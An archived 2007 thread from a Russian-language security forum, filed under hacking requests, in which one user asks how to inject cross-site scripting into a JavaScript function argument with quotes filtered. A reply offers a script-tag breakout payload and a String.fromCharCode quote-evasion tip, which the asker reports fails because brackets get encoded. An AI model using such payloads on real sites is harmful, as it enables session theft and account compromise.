ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Как провести Xss в аргументах функции (метода)
  #1  
Старый 02.07.2007, 12:12
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию Как провести Xss в аргументах функции (метода)

Есть такой кусок кода
Цитата:
<script type="text/javascript">activity_editor.setup("Я_ВВОЖУ_ УТ.");</script>
Кавычки фильтруются (%22 и \&#34)


Существует ли возможность проведения атаки?
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 

  #2  
Старый 02.07.2007, 16:36
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


По умолчанию

Легко, если скобке не режутся.
Код:
<script type="text/javascript">activity_editor.setup("</script><script>alert();</script>");</script>
Оранжевым то, что ты вводишь. А чтобы обойтись без кавычек и вставить нормально ява-код, юзай String.fromCharCode(1,1,1,1,1...);
 

  #3  
Старый 02.07.2007, 18:35
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

Цитата:
<script type="text/javascript">activity_editor.setup("&lt;/script&gt;<script&gt;alert();&lt;/script&gt;.");</script>
Вот в такую хрень превратилось =(.
&_#60; не прокатывает (
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.

Последний раз редактировалось 1ten0.0net1; 02.07.2007 в 18:39..
 

  #4  
Старый 02.07.2007, 20:24
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


По умолчанию

Тогда думаю мы в пролёте
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ